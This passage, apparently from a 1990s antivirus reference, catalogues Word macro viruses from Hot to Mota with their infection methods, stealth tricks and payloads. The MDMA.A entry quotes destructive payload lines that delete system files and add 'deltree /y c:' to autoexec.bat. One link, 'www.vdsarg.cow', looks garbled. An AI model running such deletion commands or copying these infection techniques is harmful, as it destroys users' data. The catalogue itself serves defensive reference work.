  20402. determine whether or not a document is already infected.
  20403.  
  20404. Some of the macros are renamed when they are copied by the
  20405. WordBasic "MacroCopy" command:
  20406.  
  20407. "AutoOpen"          becomes  "StartOfDoc"
  20408. "DrawBringInFrOut"  becomes  "AutoOpen"
  20409. "InsertPBreak"      becomes  "InsertPageBreak"
  20410. "ToolsRepaginat"    becomes  "FileSave"
  20411.  
  20412. In addition, the global template contains the following macros:
  20413.  
  20414. "FileSave" (similar to "ToolsRepaginat")
  20415. "StartOfDoc" (similar to "AutoOpen")
  20416.  
  20417. Hot also uses special functions from the Windows file
  20418. "KERNEL.EXE" (Win API). It uses the API to find the path to
  20419. Windows and to open files with simple functions.
  20420. It should be noted that many other options were available to
  20421. the virus author.
  20422.  
  20423. The destructive payload, which is reached upon arrival of the
  20424. hot date" set under the "QLHot" section in the WINWORD6.ini
  20425. file, deletes text from the current active document. This
  20426. payload is bypassed if the file EGA5.CPI is present in the
  20427. "C:\DOS" directory.
  20428.  
  20429. A comment in the virus source code suggests that this is a
  20430. "feature" designed to protect the virus author and his friends.
  20431.  
  20432.  
  20433. [Word_Hunter.A:De (a.k.a. Headhunter V 3.0)]
  20434. Virus name: Word.Hunter.A:De (a.k.a. Headhunter V 3.0)
  20435. Virus Type: Word macro virus
  20436. Number of macros: 3
  20437. Encrypted: Yes
  20438. Macro names: AutoOpen, DateiNeu, ExtrasMakro
  20439. Size of macros: 1051 Bytes
  20440. Place of origin: Germany
  20441. Date of origin: Spring 1997
  20442. Payload: Yes
  20443. Seen In-The-Wild: No
  20444. Description:
  20445.  
  20446. Hunter.A does not infect the global template. It saves an
  20447. infected document to the Word STARTUP directory
  20448. (WINWORD.DOT), which is used to infect new documents
  20449. when they are created (DateiNeu - translated: FileNew).
  20450.  
  20451. Hunter.A uses "ExtrasMakro" to make recognition of an
  20452. infected document more difficult (called macro stealth technique).
  20453.  
  20454. When Hunter.A triggers (probability of 1/60), it displays the
  20455. following message:
  20456.  
  20457. "   One - You lock the target   "
  20458. "   Two - You bait the line    "
  20459. "   Three - You slowly spread the net   "
  20460. "   And Four - You catch the man   "
  20461.  
  20462. Hunter.A uses language specific macros, therefore it only works
  20463. with the German version of Microsoft Word.
  20464.  
  20465.  
  20466. [Word_Hunter.B:De (aka Headhunter V 3.1)]
  20467. Virus name: Word.Hunter.B:De (aka Headhunter V 3.1)
  20468. Virus Type: Word macro virus
  20469. Number of macros: 3
  20470. Encrypted: Yes
  20471. Macro names: AutoOpen, DateiNeu, ExtrasMakro
  20472. Size of macros: 1126 Bytes
  20473. Place of origin: Germany
  20474. Date of origin: Spring 1997
  20475. Payload: Yes
  20476. Seen In-The-Wild: No
  20477. Description:
  20478.  
  20479. The main difference between this new variant and the previous
  20480. Hunter.A virus is that Hunter.B contains some modified codes.
  20481.  
  20482. Hunter.B does not infect the global template. It saves an
  20483. infected document to the Word STARTUP directory
  20484. (WINWORD.DOT), which is used to infect new documents
  20485. when they are created (DateiNeu - translated: FileNew).
  20486.  
  20487. Hunter.B uses "ExtrasMakro" to make recognition of an infected
  20488. document more difficult (called macro stealth technique).
  20489.  
  20490. When Hunter.B triggers (probability of 1/60), it displays the
  20491. following message:
  20492.  
  20493. "   One - You lock the target   "
  20494. "   Two - You bait the line    "
  20495. "   Three - You slowly spread the net   "
  20496. "   And Four - You catch the man   "
  20497.  
  20498. Hunter.B uses language specific macros, therefore it only works
  20499. with the German version of Microsoft Word.
  20500.  
  20501.  
  20502. [Word_Hunter.C:De (aka Headhunter V 3.5)]
  20503. Virus name: Word.Hunter.C:De (aka Headhunter V 3.5)
  20504. Virus Type: Word macro virus
  20505. Number of macros: 3
  20506. Encrypted: Yes
  20507. Macro names: AutoOpen, DateiNeu, ExtrasMakro
  20508. Size of macros: Polymorphic
  20509. Place of origin: Germany
  20510. Date of origin: Spring 1997
  20511. Payload: Yes
  20512. Seen In-The-Wild: No
  20513. Description:
  20514.  
  20515. The main difference between this new variant and previous
  20516. Hunter viruses is that Hunter.C adds text to its macros,
  20517. therefore making it a polymorphic virus.
  20518.  
  20519. Hunter.C uses the same "ExtrasMakro" from variant A and B
  20520. to make recognition of an infected document more difficult
  20521. (called macro stealth technique).
  20522.  
  20523. Hunter.C uses language specific macros, therefore it only
  20524. works with the German version of Microsoft Word.
  20525.  
  20526.  
  20527.  
  20528. [Word_Hybrid.A]
  20529. Virus name: Word.Hybrid.A
  20530. Virus Type: Word macro virus
  20531. Number of macros: 3
  20532. Encrypted: Yes
  20533. Macro names: AutoOpen, AutoClose, FileSaveAs
  20534. Size of macros: 2815 Bytes
  20535. Place of origin: Unknown
  20536. Date of origin: January 1997
  20537. Destructive: No
  20538. Common In-The-Wild: Yes
  20539. Description:
  20540.  
  20541. As the name suggests, the Hybrid virus is a combination of a
  20542. virus with a macro anti-virus solution.
  20543.  
  20544. Its "AutoClose" macro has been snatched from a well-known,
  20545. yet ineffective, anti-virus solution called ScanProt (written by
  20546. Microsoft).
  20547.  
  20548. Hybrid activates when an infected document in opened.
  20549. Further documents become infected when they are saved with
  20550. the "FileSaveAs" command.
  20551.  
  20552. Hybrid has been found In-the-Wild and can be
  20553. detected/disinfected with any better anti-virus solution.
  20554.  
  20555.  
  20556. [Word_Hybrid.B]
  20557. Virus name: Word.Hybrid.B
  20558. Virus Type: Word macro virus
  20559. Number of macros: 1
  20560. Encrypted: Yes
  20561. Macro names: AutoOpen, AutoClose, FileSaveAs
  20562. Size of macros:  2815 Bytes
  20563. Place of origin: Unknown
  20564. Date of origin: February 1997
  20565. Destructive: No
  20566. Common In-The-Wild: No
  20567. Description:
  20568.  
  20569. Hybrid.B is a new variant based on the original Hybrid.A
  20570. virus. The only difference between the two viruses is that the
  20571. "AutoClose" macro, snatched from the anti-virus macro
  20572. solution ScanProt, is corrupted. Due to this corruption Microsoft
  20573. Word displays a WordBasic error message whenever a document is closed.
  20574.  
  20575. "Unknown Command, Subroutine or Function"
  20576.  
  20577. For additional information, please refer to the Hybrid.A virus
  20578. description.
  20579.  
  20580.  
  20581. [Word_Hybrid.C]
  20582. Virus name: Word.Hybrid.C
  20583. Virus Type: Word macro virus
  20584. Number of macros: 3
  20585. Encrypted: Yes
  20586. Macro names: AutoOpen, AutoClose, FileSaveAs
  20587. Size of macros: 2815 Bytes
  20588. Place of origin: Unknown
  20589. Date of origin: Spring 1997
  20590. Destructive: No
  20591. Common In-The-Wild: No
  20592. Description:
  20593.  
  20594. Hybrid.C is a new variant based on the original Hybrid.A
  20595. virus.  The only difference between the two viruses is that the
  20596. "AutoClose" macro, snatched from the anti-virus macro
  20597. solution ScanProt, is corrupted. Due to this corruption Microsoft
  20598. Word displays the following error message when a user tries to close
  20599. a file:
  20600.  
  20601. "   syntax error   "
  20602.  
  20603. For additional information, please refer to the Hybrid.A virus
  20604. description.
  20605.  
  20606.  
  20607. [Word_Imposter.A]
  20608. Virus name: Word.Imposter.A
  20609. Virus Type: Word macro virus
  20610. Number of macros: 2
  20611. Encrypted: No
  20612. Macro names: AutoClose, DMV (FileSaveAs)
  20613. Size of macros: 907 Bytes
  20614. Place of origin: England
  20615. Date of origin: March 1996
  20616. Destructive: No
  20617. Common In-The-Wild: Yes
  20618. Description:
  20619.  
  20620. Imposter infects the global template (normal.dot) when an
  20621. infected document is closed and the macros "DMV" and
  20622. "FileSaveAs" do not exist. When Imposter.A copies the "DMV" macro,
  20623. it renames it to "FileSaveAs" and displays the following message:
  20624.  
  20625. "   DMV   "
  20626.  
  20627. Further documents become infected when the "FileSaveAs"
  20628. command is used.
  20629.  
  20630. The following text can be found inside Imposter.A, but is not
  20631. displayed:
  20632.  
  20633. "   just to prove another point   "
  20634.  
  20635. This text is based on the Concept virus, which has "this is
  20636. enough to prove my point" in its virus code.
  20637.  
  20638.  
  20639. [Word_Imposter.B]
  20640. Virus name: Word.Imposter.B
  20641. Virus Type: Word macro virus
  20642. Number of macros: 2
  20643. Encrypted: No
  20644. Macro names: AutoClose, DMV (FileSaveAs)
  20645. Size of macros: 907 Bytes
  20646. Place of origin: England
  20647. Date of origin: March 1996
  20648. Destructive: No
  20649. Common In-The-Wild: No
  20650. Description:
  20651.  
  20652. The only difference between this new variant and the original
  20653. Imposter virus is the spelling of the comment in the virus code.
  20654.  
  20655. Please refer to Imposter.A for more information.
  20656.  
  20657.  
  20658. [Word_Irish.A]
  20659. Virus name: Word.Irish.A
  20660. Virus Type: Word macro virus
  20661. Number of macros: 4
  20662. Encrypted: No
  20663. Macro names: AutoOpen, WordHelp, AntiVirus, WordHelpNT
  20664. Size of macros: 4152 Bytes
  20665. Place of origin: USA
  20666. Date of origin: Spring 1996
  20667. Destructive: No
  20668. Common In-The-Wild: No
  20669. Description:
  20670.  
  20671. Irish infects the global template (normal.dot) when an infected
  20672. document is opened. Further documents become infected when
  20673. the "FileSave" command is used.
  20674.  
  20675. Two of the macros, "WordHelp" and "WordHelpNT", do not
  20676. run automatically. However, when executed manually by the
  20677. user, they will change the Windows desktop color to green.
  20678.  
  20679. The macro "WordHelpNT" contains a payload which attempts
  20680. to activate the screen saver and display the following
  20681. message:
  20682.  
  20683. "   Happy Saint Patties Day   "
  20684.  
  20685. However the payload seems to be faulty and does not work
  20686. under Windows 95 (Irish only exists in Microsoft Word).
  20687.  
  20688.  
  20689. [Word_Italian.A]
  20690. Virus name:  Word.Italian.A
  20691. Virus Type: Word macro virus
  20692. Number of macros: 3
  20693. Encrypted: Yes
  20694. Macro names: FileMacro, FileChiudi, FileEsci, FileSalva,
  20695.              WordMacro1, WordMacro2
  20696. Size of macros: 1438 Bytes
  20697. Place of origin: Italy
  20698. Date of origin: January 1996
  20699. Destructive: No
  20700. Seen In-The-Wild: No
  20701. Description:
  20702.  
  20703. Italian is the first functional virus written for the Italian version
  20704. of Microsoft Word.
  20705.  
  20706. When an infected document is opened on the 7th, 13th, 17th
  20707. or 31st of each month it displays the following message:
  20708.  
  20709. "   Your PC is infected by   "
  20710. "   Word.Macro.ITALIAN Virus   "
  20711. "   Written Jan,1996.   "
  20712.  
  20713.  
  20714. [Word_Johnny.A(GoJohnny)]
  20715. Virus name: Word.Johnny.A (GoJohnny)
  20716. Virus Type: Word macro virus
  20717. Number of macros: 5 or 6
  20718. Encrypted: Yes, 4/5 or 5/6
  20719. Macro names: Presentv, AutoOpen, Presentw, FileSaveAs. Presentz,
  20720.              FileSave, vGojohnny
  20721. Size of macros:  3393 Bytes in .doc files
  20722.                  4955 Bytes in global template
  20723. Place of origin: Unknown
  20724. Date of origin: Unknown
  20725. Payload: Yes
  20726. Seen In-The-Wild: No
  20727. Description:
  20728.  
  20729. Johnny infects the global template (normal.dot) when an
  20730. infected file is opened. Further documents become infected
  20731. when they are saved with the "FileSave" or "FileSaveAs"
  20732. command.
  20733.  
  20734. When Johhny triggers it creates a new document with the
  20735. following text:
  20736.  
  20737. "   NAIPESVOH REHM   "
  20738.  
  20739. After that it puts the following message on the status bar:
  20740.  
  20741. "   Starting Autosave   "
  20742.  
  20743. To make recognition of an infection more difficult, Johnny
  20744. turns off the prompting of Word before it infects the global
  20745. template.
  20746.  
  20747.  
  20748. [Word_Johnny.B]
  20749. Virus name: Word.Johnny.B
  20750. Virus Type: Word macro virus
  20751. Number of macros: 5 (or 6)
  20752. Encrypted: Yes
  20753. Macro names: AutoOpen, Presentv, Presentw, Presentz,
  20754.              vGoJohnny
  20755. Size of macros: 3992 Bytes
  20756. Place of origin: UK
  20757. Date of origin:  January 1997
  20758. Payload: Yes
  20759. Common In-The-Wild: No
  20760. Description:
  20761.  
  20762. The difference between this new variant and the original
  20763. Johnny.A virus is that Johnny.B is now able to infect the
  20764. French version of Microsoft Word.
  20765.  
  20766. The following 2 macros are changed:
  20767.  
  20768. "FichierEnregistre" instead of "FileSave" and "FichierEnregistreSous"
  20769. instead of "FileSaveAs".
  20770.  
  20771. For more information, please refer to the Johnny.A virus description.
  20772.  
  20773.  
  20774. [Word_Kerrang.A]
  20775. Virus name: Word.Kerrang.A
  20776. Virus Type: Word macro virus
  20777. Number of macros: 5
  20778. Encrypted: Yes
  20779. Macro names: AutoExec, FileOpen, FileSaveAs, FilePrintDefault,
  20780.              ToolsMacro
  20781. Size of macros: 972 Bytes
  20782. Place of origin: Unknown
  20783. Date of origin: February 1997
  20784. Destructive: Yes
  20785. Common In-The-Wild: No
  20786. Description:
  20787.  
  20788. Kerrang activates when an infected document is opened. After
  20789. the global template becomes infected, it disables the Microsoft
  20790. Word virus protection every time Microsoft Word is started
  20791. (AutoExec).
  20792.  
  20793. Further documents become infected when they are saved with
  20794. the FileSave and FileSaveAs commands.
  20795.  
  20796. Kerrang uses "ToolsMacro" to make recognition of an infected
  20797. file more difficult (called macro stealth technique). When the
  20798. user selects this option, Kerrang creates 65 new documents.
  20799.  
  20800. Kerrang has various payloads. It checks for the system time
  20801. and if the time is 18:00 (6:00 p.m.) is adds the following text
  20802. to the printed document:
  20803.  
  20804. "   Kerbaffely Urgo Kerranga! Kerranga!!!!   "
  20805.  
  20806. After that it launches its second payload which deletes all files
  20807. with the extension *.DOC in the current directory.
  20808.  
  20809.  
  20810. [Word_KillDll.A]
  20811. Virus name: Word.KillDll.A
  20812. Virus Type: Word macro virus
  20813. Number of macros: 1
  20814. Encrypted: No
  20815. Macro names: AutoOpen
  20816. Size of macros: 284 Bytes
  20817. Place of origin: Unknown
  20818. Date of origin:  Summer 1996
  20819. Destructive: Yes
  20820. Common In-The-Wild: No
  20821. Description:
  20822.  
  20823. KillDLL activates when an infected document is opened
  20824. (AutoOpen).
  20825.  
  20826. KillDLL is one of the very few destructive viruses. Upon each
  20827. startup of Word, it will delete all files in the WINDOWS
  20828. directory, matching the extensions:
  20829.  
  20830.   *.D??
  20831.  
  20832. Affected are mostly .DLL files and .DRV files, which are
  20833. essential for Microsoft Windows.
  20834.  
  20835.  
  20836. [Word_KillPort.A]
  20837. Virus name: Word.KillProt.A
  20838. Virus Type: Word macro virus
  20839. Number of macros: 4
  20840. Encrypted: Yes
  20841. Macro names: AutoExec, FileOpen, FileSaveAs, ToolsMacro
  20842. Size of macros: 2272 Bytes
  20843. Place of origin: Unknown
  20844. Date of origin: 1997
  20845. Payload: Yes
  20846. Common In-The-Wild: No
  20847. Description:
  20848.  
  20849. KillProt.A infects the global template when an infected
  20850. document is opened (FileOpen) or the ToolsMacro command
  20851. is selected. Further documents become infected when they
  20852. are opened (FileOpen) or saved (FileSaveAs).
  20853.  
  20854. KillProt's name was chosen because KillProt deletes the
  20855. following macros:
  20856.  
  20857. "AutoExit"
  20858. "InstVer"
  20859. "ShellOpen"
  20860.  
  20861. All of them are located in the anti-virus macro solution
  20862. "ScanProt".
  20863.  
  20864. KillProt also modifies .INI settings in the Windows directory.
  20865. It creates the entry "Count=xxx" under the "Infector" section.
  20866. Whenever a document is saved with the FileSaveAs command,
  20867. KillProt increments the value. The payload triggers whenever
  20868. 10 documents have been saved. It then adds the following
  20869. password to the saved document:
  20870.  
  20871. "   WhatTheHell   "
  20872.  
  20873.  
  20874. [Word_MVDK1(Kit)]
  20875. Virus Kit Name: Word.MVDK1 (Kit)
  20876. Virus Type: Word macro virus
  20877. Size of document: 23618 Bytes
  20878. Number of macros: 5
  20879. Place of origin: Russia
  20880. Date of origin: Summer 1996
  20881. Description:
  20882.  
  20883. MVDK does not generate ready-to-run viruses. It only creates
  20884. the source code, which is put into text format and saved in the
  20885. C:\ directory. Infected documents have to be created by the author
  20886. himself.
  20887.  
  20888. The function to infect the global template and documents is
  20889. placed in one main macro, named by the virus creator.
  20890. The AutoOpen macro is always present, while other infection
  20891. methods can be added (infection on FileOpen, FileNew and
  20892. FileSave).
  20893.  
  20894. MVDK offers various payloads:
  20895.  
  20896. 1. deleting system files
  20897.  
  20898. 2. saving files with a password (on certain date and time)
  20899.  
  20900. 3. dropping a DOS based program (or virus)
  20901.  
  20902. As a result of the payloads, "FileSaveAs" and "PayLoad" can
  20903. also be present in the virus code.
  20904.  
  20905.  
  20906. [Word_Kompu.A]
  20907. Virus name: Word.Kompu.A
  20908. Virus Type: Word macro virus
  20909. Number of macros: 2
  20910. Encrypted: No
  20911. Macro names: AutoOpen, AutoClose
  20912. Size of macros: 517 Bytes
  20913. Place of origin: ?Russia?
  20914. Date of origin: Unknown
  20915. Payload: Yes
  20916. Seen In-The-Wild: No
  20917. Description:
  20918.  
  20919. Kompu infects the global template (normal.dot) when an
  20920. infected document is opened. Further documents become
  20921. infected when they are opened or closed.
  20922.  
  20923. On the 6th and 8th of each month, Kompu displays the
  20924. following message:
  20925.  
  20926. "   Tahan kommi!, Mul on paha tuju!   "
  20927.  
  20928. It then waits for an input from the user. To close the message
  20929. box, the user needs to enter the following text:
  20930.  
  20931. "   komm   "
  20932.  
  20933. Kompu also adds the following message to a printed
  20934. document:
  20935.  
  20936. "   Naemm-Naemm-Naemm-Naemm-Amps-Amps-Amps-
  20937.     Amps-Kloemps-Kroeoek!   "
  20938.  
  20939.  
  20940.  
  20941. [Word_Lazy.A]
  20942. Virus name: Word.Lazy.A
  20943. Virus Type: Word macro virus
  20944. Number of macros: 2
  20945. Encrypted: Yes
  20946. Macro names: AutoOpen, Lazy
  20947. Size of macros: 664 Bytes
  20948. Place of origin: Unknown
  20949. Date of origin: Spring 1997
  20950. Payload: Yes
  20951. Seen In-The-Wild: No
  20952. Description:
  20953.  
  20954. Lazy infects the global template when an infected document is
  20955. opened. Further documents become infected when they are also
  20956. opened (AutoOpen).
  20957.  
  20958. When Lazy triggers (Friday 13th), it sets a password to the
  20959. active document.
  20960.  
  20961. If you find a document with an unknown password, please
  20962. download a copy of WinWord Password Recovery Tool
  20963. (wwprt). It is available at: www.vdsarg.cow.
  20964.  
  20965.  
  20966. [Word_Lemon.A (aka Melon)]
  20967. Virus name: Word.Lemon.A (aka Melon)
  20968. Virus Type: Word macro virus
  20969. Number of macros: 2
  20970. Encrypted: Yes
  20971. Macro names: AutoOpen, Lemon (Melon)
  20972. Size of macros: 664 Bytes
  20973. Place of origin: Unknown
  20974. Date of origin: Spring 1997
  20975. Payload: Yes
  20976. Seen In-The-Wild: No
  20977. Description:
  20978.  
  20979. Lemon.A infects the global template when an infected
  20980. document is opened. Further documents become infected
  20981. when they are also opened (AutoOpen).
  20982.  
  20983. When Lemon triggers (probability of 1/31), it displays the
  20984. following message:
  20985.  
  20986. "   !!LEMON!!!!MELON!!   "
  20987. "   !!LEMON!!!!MELON!!   "
  20988.  
  20989.  
  20990. [Word_Lemon.B]
  20991. Virus name: Word.Lemon.B
  20992. Virus Type: Word macro virus
  20993. Number of macros: 1
  20994. Encrypted: Yes
  20995. Macro names: AutoOpen
  20996. Size of macros: 577 Bytes
  20997. Place of origin: Unknown
  20998. Date of origin: Spring 1997
  20999. Payload: No
  21000. Seen In-The-Wild: No
  21001. Description:
  21002.  
  21003. Lemon.B infects the global template when an infected
  21004. document is opened. Further documents become infected
  21005. when they are also opened (AutoOpen).
  21006.  
  21007. Lemon.B removes "ExtrasMakro" to make recognition of an
  21008. infected document more difficult (called macro stealth
  21009. technique).
  21010.  
  21011.  
  21012. [Word_Lunch.A]
  21013. Virus name: Word.Lunch.A
  21014. Virus Type: Word macro virus
  21015. Number of macros: 3
  21016. Encrypted: No
  21017. Macro names: AutoOpen (FileSave), NEWAO, NEWFS
  21018. Size of macros: 1579 Bytes in .doc files
  21019.                 1718 Bytes in global template
  21020. Place of origin: Unknown
  21021. Date of origin: Unknown
  21022. Destructive: No
  21023. Seen In-The-Wild: No
  21024. Description:
  21025.  
  21026. Lunch infects the global template (normal.dot) when an
  21027. infected document is opened. The "AutoOpen" macro is
  21028. renamed to "FileSave" when Lunch infects the global
  21029. template. As a result, further documents become infected
  21030. when they are saved with the FileSave command.
  21031.  
  21032. When an infected document is saved at 12:01 pm, Lunch
  21033. displays the following message:
  21034.  
  21035. "   !Whatya doin'here? Take a lunch break!   "
  21036.  
  21037.  
  21038. [Word_Lunch.B]
  21039. Virus name: Word.Lunch.B
  21040. Virus Type: Word macro virus
  21041. Number of macros: 3
  21042. Encrypted: No
  21043. Macro names: AutoOpen (FileSave), NEWAO, NEWFS
  21044. Size of macros: 1375 Bytes in .doc files
  21045.                 1463 Bytes in global template
  21046. Place of origin: Unknown
  21047. Date of origin: Unknown
  21048. Destructive: No
  21049. Seen In-The-Wild: No
  21050. Description:
  21051.  
  21052. The difference between this new variant and the original
  21053. Lunch.A virus is that Lunch.B does not check for the presence
  21054. of the "FileOpen" and "AutoExit" macros. Instead it checks for
  21055. the presence of the "FileSave" macro before infecting the
  21056. global template (normal.dot).
  21057.  
  21058. For more information, please refer to the Lunch.A virus.
  21059.  
  21060.  
  21061. [Word_Maddog.A]
  21062. Virus name: Word.Maddog.A
  21063. Virus Type: Word macro virus
  21064. Number of macros: 6
  21065. Encrypted: No
  21066. Macro names: AutoOpen, AutoClose, AutoExec, FileClose,
  21067.              AopnFinish, FcFinish
  21068. Size of macros: 4209 Bytes
  21069. Place of origin: Unknown
  21070. Date of origin: 1996
  21071. Destructive: Yes
  21072. Common In-The-Wild: No
  21073. Description:
  21074.  
  21075. MadDog.A infects the global template (normal.dot) when an
  21076. infected document is opened. Further documents become
  21077. infected when they are opened and closed (FileClose). Upon
  21078. closing a document, MadDog.A saves various times to
  21079. "Temp.dot" and then saves the active document. It also
  21080. creates the following file in the active directory:
  21081.  
  21082. "   Filename.dat   "
  21083.  
  21084. When a user closes a document (AutoClose) between 8 and 9
  21085. PM, Maddog.A replaces the letter "e" with "a".
  21086.  
  21087.  
  21088. [Word_Maddog.B]
  21089. Virus name: Word.Maddog.B
  21090. Virus Type: Word macro virus
  21091. Number of macros: 6
  21092. Encrypted: No
  21093. Macro names: AutoOpen, AutoClose, AutoExec, FileClose,
  21094.              AopnFinish, FcFinish
  21095. Size of macros: 4259 Bytes
  21096. Place of origin: Unknown
  21097. Date of origin: 1996
  21098. Destructive: Yes
  21099. Common In-The-Wild: Yes
  21100. Description:
  21101.  
  21102. The difference between this new variant and the original
  21103. Maddog.A virus is that the code has been slightly modified.
  21104.  
  21105. MadDog.B infects the global template (normal.dot) when an
  21106. infected document is opened. Further documents become
  21107. infected when they are opened and closed (FileClose). Upon
  21108. closing a document, MadDog.B saves various times to
  21109. "Temp.dot" and then saves the active document. It also
  21110. creates the following file in the active directory:
  21111.  
  21112. "   Filename.dat   "
  21113.  
  21114. When a user closes a document (AutoClose) between 8 and 9
  21115. PM, Maddog.B replaces the letter "e" with "a".
  21116.  
  21117.  
  21118. [Word_MDMA.A (a.k.a. StickyKeys, MDMA_DMV)]
  21119. Virus name: Word.MDMA.A (a.k.a. StickyKeys, MDMA_DMV)
  21120. Virus Type: Word macro virus
  21121. Number of macros: 1
  21122. Encrypted: No
  21123. Macro names: AutoClose
  21124. Size of macros: 1635 Bytes
  21125. Place of origin: USA
  21126. Date of origin: July 1996
  21127. Destructive: Yes
  21128. Common In-The-Wild: Yes
  21129. Description:
  21130.  
  21131. MDMA is the first macro virus that tries to work on Windows,
  21132. Windows 95, Macintosh and Windows NT. It can be a very
  21133. destructive virus, and Word users are strongly advised to
  21134. check their system with an up-to-date anti-virus program.
  21135.  
  21136. MDMA infects the global template (normal.dot) when an
  21137. infected document is opened and then closed. Further
  21138. documents become infected when they are closed ("AutoClose").
  21139.  
  21140. If an infected document is loaded on the first of each month,
  21141. MDMA activates its destructive payload. Due to a bug in the
  21142. code MDMA will always call the Windows 95 payload, even
  21143. though there are other payloads for other operating systems.
  21144. Below are all the payloads:
  21145.  
  21146. Windows:
  21147. --------
  21148. Kill "c:\shmk."; "deltree /y c:" is added to autoexec.bat
  21149.  
  21150. This will delete all the directories on the C:\ drive.
  21151.  
  21152. Windows NT:
  21153. -----------
  21154. Kill "*.*"; Kill "c:\shmk."
  21155.  
  21156. This will delete all the files on the C:\ drive
  21157.  
  21158. Macintosh:
  21159. ----------
  21160. Kill MacID$("****")
  21161.  
  21162. This will delete all files on the hard drive.
  21163.  
  21164. Windows 95:
  21165. -----------
  21166. Kill "c" \shmk."; Kill "c:\windows\*.hlp";
  21167. Kill "c:\windows\system\*.cpl"
  21168. SetPrivateProfileString ("HKEY_CURRENT_USER\Control
  21169. Panel\Accessibility\Stickykeys", "On", "1", "")
  21170. SetPrivateProfileString
  21171. ("HKEY_LOCAL_MACHINE\Network\Logon","ProcessLoginScript", "00","")
  21172. SetPrivateProfileString ("HKEY_CURRENT_USER\Control
  21173. Panel\Accessibility\HighContrst", "On", "1", "")
  21174.  
  21175. This will delete important Windows files.
  21176.  
  21177. MDMA will also display the following message:
  21178.  
  21179. "  You are infected with MDMA_DMV. Brought to you by MDMA   "
  21180. "         (Many Delinquent Modern Anarchists).   "
  21181.  
  21182.  
  21183.  
  21184. [Word_MDMA.B (a.k.a. StickyKeys, MDMA_DMV)]
  21185. Virus name: Word.MDMA.B (a.k.a. StickyKeys, MDMA_DMV)
  21186. Virus Type: Word macro virus
  21187. Number of macros: 1
  21188. Encrypted: Yes
  21189. Macro names: AutoClose
  21190. Size of macros: 1635 Bytes
  21191. Place of origin: USA
  21192. Date of origin: 1996
  21193. Destructive: No
  21194. Common In-The-Wild: No
  21195. Description:
  21196.  
  21197. The main difference between this new variant and the older
  21198. MDMA.A virus is that its payload is corrupted.
  21199. Microsoft Word does not care about corrupted macros,
  21200. therefore MDMA.B is still able to replicate.
  21201.  
  21202. MDMA.B infects the global template (normal.dot) when an
  21203. infected document is opened and then closed. Further
  21204. documents become infected when they are closed ("AutoClose").
  21205.  
  21206.  
  21207. [Word_MDMA.C (a.k.a. StickyKeys, MDMA_DMV)]
  21208. Virus name: Word.MDMA.C (a.k.a. StickyKeys, MDMA_DMV)
  21209. Virus Type: Word macro virus
  21210. Number of macros: 1
  21211. Encrypted: No
  21212. Macro names: AutoClose
  21213. Size of macros: 1025 Bytes
  21214. Place of origin: USA
  21215. Date of origin: October 1996
  21216. Destructive: Yes
  21217. Common In-The-Wild: No
  21218. Description:
  21219.  
  21220. The main difference between this new variant and the older
  21221. MDMA.A virus is that the code was partially modified.
  21222.  
  21223. MDMA.C infects the global template (normal.dot) when an
  21224. infected document is opened and then closed. Further
  21225. documents become infected when they are closed ("AutoClose").
  21226.  
  21227. Upon closing a document after the 20th of each month,
  21228. MDMA.C triggers its destructive payload. It tries to delete the
  21229. following files:
  21230.  
  21231. C:\shmk.
  21232. all *.hlp (Help) files in the C:\Windows directory
  21233. all *.cpl files in the C:\Windows\System directory
  21234.  
  21235. Again, MDMA.C has a payload for the Macintosh, which is
  21236. never executed.
  21237.  
  21238.  
  21239. [Word_MDMA.D (a.k.a. StickyKeys, MDMA_DMV)]
  21240. Virus name: Word.MDMA.D (a.k.a. StickyKeys, MDMA_DMV)
  21241. Virus Type: Word macro virus
  21242. Number of macros: 1
  21243. Encrypted: No
  21244. Macro names: AutoClose
  21245. Size of macros: 744 Bytes
  21246. Place of origin: USA
  21247. Date of origin: October 1996
  21248. Destructive: No
  21249. Common In-The-Wild: Yes
  21250. Description:
  21251.  
  21252. The main difference between this new variant and the older
  21253. MDMA.C virus is that some of the codes are missing.
  21254.  
  21255. MDMA.D infects the global template (normal.dot) when an
  21256. infected document is opened and then closed. Further
  21257. documents become infected when they are closed ("AutoClose").
  21258.  
  21259. While MDMA.C tries to delete certain files after the 20th of
  21260. each month, MDMA.D does not contain this destructive
  21261. payload. It only has a payload for the Macintosh, which is
  21262. never executed.
  21263.  
  21264.  
  21265. [Word_MDMA.E (a.k.a. StickyKeys, MDMA_DMV)]
  21266. Virus name: Word.MDMA.E (a.k.a. StickyKeys, MDMA_DMV)
  21267. Virus Type: Word macro virus
  21268. Number of macros: 1
  21269. Encrypted: No
  21270. Macro names: AutoClose
  21271. Size of macros: 735 Bytes
  21272. Place of origin: USA
  21273. Date of origin: 1996
  21274. Destructive: No
  21275. Common In-The-Wild: No
  21276. Description:
  21277.  
  21278. The main difference between this new variant and the older MDMA.D
  21279. virus is that some of the codes are missing.
  21280.  
  21281. MDMA.E infects the global template (normal.dot) when an infected
  21282. document is opened and then closed. Further documents become
  21283. infected when they are closed ("AutoClose").
  21284.  
  21285. While some other MDMA variants contain destructive payloads, MDMA.E
  21286. does not delete any files.
  21287.  
  21288.  
  21289.  
  21290. [Word_Mind.A (aka Puritan)]
  21291. Virus name: Word.Mind.A (aka Puritan)
  21292. Virus Type: Word macro virus
  21293. Number of macros: 6 or 1
  21294. Encrypted: No
  21295. Macro names: AOB, FSAB, Retro, Puritan, FileSaveAs, ToolsMacro
  21296. Size of macros: 5415 (Mind.A) or 753 (Mind.A1)
  21297. Place of origin: Unknown
  21298. Date of origin: Spring 1997
  21299. Destructive: No
  21300. Seen In-The-Wild: No
  21301. Description:
  21302.  
  21303. Mind.A (Mind.A1) is another virus that is not capable of
  21304. infecting other documents. Therefore, it is highly unlikely that
  21305. people will run into infected documents with the Mind virus.
  21306.  
  21307.  
  21308. [Word_Mota.A]
  21309. Virus name: Word.Mota.A
  21310. Virus Type: Word macro virus
  21311. Number of macros: 5
  21312. Encrypted: Yes
  21313. Macro names: No2, AutoExec, AutoOpen, FileExit, FileSaveAs
  21314. Size of macros: 1578 Bytes
  21315. Place of origin: Unknown
  21316. Date of origin: Spring 1997
  21317. Destructive: No
  21318. Seen In-The-Wild: No
  21319. Description:
  21320.  
  21321. Mota infects the global template when an infected document is
  21322. opened. Further documents become infected when they are saved
  21323. (FileSaveAs).
  21324.  
  21325. Upon "FileExit", Mota disables the anti-virus protection of
  21326. Microsoft Word 7.0 and the warning message before saving
  21327. the global template (normal.dot).
  21328.  
  21329. When Microsoft Word is started (AutoExec) from an infected
  21330. global template, Mota adds the following text to the active
  21331. document:
  21332.  
  21333. "   Mota grows..   "
  21334.  
  21335.  
  21336.  
